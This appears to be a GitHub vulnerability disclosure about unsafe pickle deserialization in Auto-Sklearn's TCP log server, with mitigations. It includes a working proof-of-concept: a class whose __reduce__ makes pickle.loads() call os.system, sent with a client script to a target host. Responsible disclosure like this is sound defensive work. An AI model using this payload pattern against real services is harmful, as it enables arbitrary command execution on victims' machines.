Remote Code Execution by Pickle Deserialization via LogRecordStreamHandler in Auto-Sklearn #1766

### Description

In the core logging functionality of the Auto-Sklearn framework (`autosklearn/util/logging_.py`), the `LogRecordStreamHandler` class directly uses `pickle.loads()` to deserialize messages received from TCP socket connections without any sanitization, which results in a remote code execution vulnerability.

The vulnerable code is located in the `unPickle()` method of the `LogRecordStreamHandler` class (lines 274-275). This method is called in the `handle()` method (line 270) when processing incoming log records from TCP connections. The server accepts pickled objects over the network and deserializes them without any validation or restriction on what classes can be instantiated. 
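For readers without the source at hand, the pattern described above can be sketched as follows. This is a minimal illustration modeled on the socket receiver from the Python logging cookbook, not a copy of `autosklearn/util/logging_.py`. The 4-byte length prefix and the final dispatch to `logging.getLogger(...)` are assumptions, and the actual code may differ in detail.

```python
import logging
import pickle
import socketserver
import struct


class LogRecordStreamHandler(socketserver.StreamRequestHandler):
    """Sketch of the vulnerable pattern (assumed framing: length prefix + pickle)."""

    def handle(self):
        while True:
            header = self.connection.recv(4)  # assumed 4-byte big-endian length
            if len(header) < 4:
                break
            size = struct.unpack(">L", header)[0]
            payload = self.connection.recv(size)
            while len(payload) < size:
                more = self.connection.recv(size - len(payload))
                if not more:  # peer closed the connection mid-frame
                    return
                payload += more
            # Untrusted bytes from the network go straight into pickle.
            attrs = self.unPickle(payload)
            record = logging.makeLogRecord(attrs)
            logging.getLogger(record.name).handle(record)

    def unPickle(self, data):
        # pickle.loads() imports and calls whatever the payload names.
        return pickle.loads(data)
```

The key point is that nothing between `recv()` and `pickle.loads()` inspects the payload, so the sender fully controls what gets imported and called.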

### Proof of Concept

**Step 1:** The victim user starts an Auto-Sklearn log server that binds to the network interface:

```bash
python log_server.py --host 0.0.0.0 --port 9020
```

**Step 2:** The attacker can then send malicious pickle-serialized data to the TCP socket. The provided `log_client.py` demonstrates how an attacker can execute arbitrary commands like `ls -l`:

```python
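class RCE:
    # __reduce__ tells pickle which callable to invoke when the object is loaded.
    def __reduce__(self):
        import os
        return (os.system, ("ls -l",))

# send_log_record and args are defined in the attached log_client.py.
record = RCE()
send_log_record(args.host, args.port, record)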
```

The `RCE` class implements the `__reduce__` method, which pickle calls when the object is serialized to obtain a callable and its arguments. That pair is stored in the payload, so when the server deserializes it, `pickle.loads()` calls `os.system("ls -l")`, resulting in remote command execution.
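The mechanism can be observed safely with a benign callable in place of `os.system`. The sketch below is only an illustration: the `Harmless` class is a hypothetical stand-in and is not part of the attached PoC.

```python
import operator
import pickle


class Harmless:
    """Stand-in for the PoC's RCE class, using a benign callable."""

    def __reduce__(self):
        # Recorded at dumps() time: "call operator.add(2, 3) to rebuild me".
        return (operator.add, (2, 3))


payload = pickle.dumps(Harmless())

# loads() invokes the recorded callable; its return value is the result.
result = pickle.loads(payload)
print(result)  # prints 5
```

No `Harmless` instance comes back from `pickle.loads()`. The deserializer simply runs the call named in the payload, which is why swapping in `os.system` yields command execution.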

To reproduce this issue:
1. Start the log server:
```bash
python log_server.py --host 0.0.0.0 --port 9020
```
2. Run the malicious client:
```bash
python log_client.py --host <target_host> --port 9020
```

A demo video is attached, along with `log_server.py` and `log_client.py`.

### Impact
Remote code execution on the victim's machine over the network. Once the victim starts the Auto-Sklearn log server with network binding, an attacker on the network can gain arbitrary code execution by:

1. Scanning and finding the victim's Auto-Sklearn logging service
2. Sending malicious pickle payloads to the logging port
3. Executing arbitrary system commands with the privileges of the Auto-Sklearn process

This vulnerability is particularly severe because:
- The pickle deserialization is completely unrestricted, allowing execution of any Python code
- No authentication or authorization is required to send log records
- The vulnerability can be exploited by anyone who can reach the server's network interface

We understand that this log server was not intended to be exposed as a public service: our review of the code shows that it is started as a secondary process alongside the main process and is, by default, meant for internal network use. However, if a deployment's network protections are weak (for example, the interface is exposed to the public internet or the firewall is misconfigured), the consequence is remote code execution (RCE). Because the security of the software should not rely solely on network isolation, we are reporting this vulnerability in the hope that it can be fixed.

### Mitigation
1. Sanitize data before deserialization: Rewrite the `unPickle()` method to use a custom `Unpickler` with a restricted `find_class()` method that only allows safe classes, or replace pickle with a safer serialization format such as JSON, msgpack, or protocol buffers.

2. Network access control: If the logging service is intended for internal use only, accept connections solely from the internal network (localhost or specific trusted IPs) and reject all other connections.
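Both mitigations can be sketched together as below. This is a rough illustration under stated assumptions, not a proposed patch. `NoGlobalsUnpickler`, `safe_unpickle`, `TRUSTED_NETWORKS`, `is_trusted`, and `TrustedOnlyTCPServer` are hypothetical names. The sketch also assumes that clients send a plain dict of primitive values, as the standard `logging.handlers.SocketHandler` does, so no class lookups are needed at all.

```python
import io
import ipaddress
import pickle
import socketserver


class NoGlobalsUnpickler(pickle.Unpickler):
    """Refuse every class/function lookup; plain containers still load."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_unpickle(data: bytes):
    # Possible drop-in replacement for the pickle.loads() call in unPickle().
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


# Hypothetical allowlist: loopback only; extend with trusted subnets as needed.
TRUSTED_NETWORKS = [
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("::1/128"),
]


def is_trusted(host: str) -> bool:
    addr = ipaddress.ip_address(host)
    return any(addr in net for net in TRUSTED_NETWORKS)


class TrustedOnlyTCPServer(socketserver.ThreadingTCPServer):
    """Drop connections from peers outside the allowlist before handling them."""

    def verify_request(self, request, client_address):
        return is_trusted(client_address[0])
```

If log records carry custom objects, `find_class()` would need a narrow allowlist instead of a blanket refusal. Binding the server to `127.0.0.1` rather than `0.0.0.0` complements the address check when only local processes need to log.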


[log_client.py](https://github.com/user-attachments/files/23650512/log_client.py)
[log_server.py](https://github.com/user-attachments/files/23650513/log_server.py)
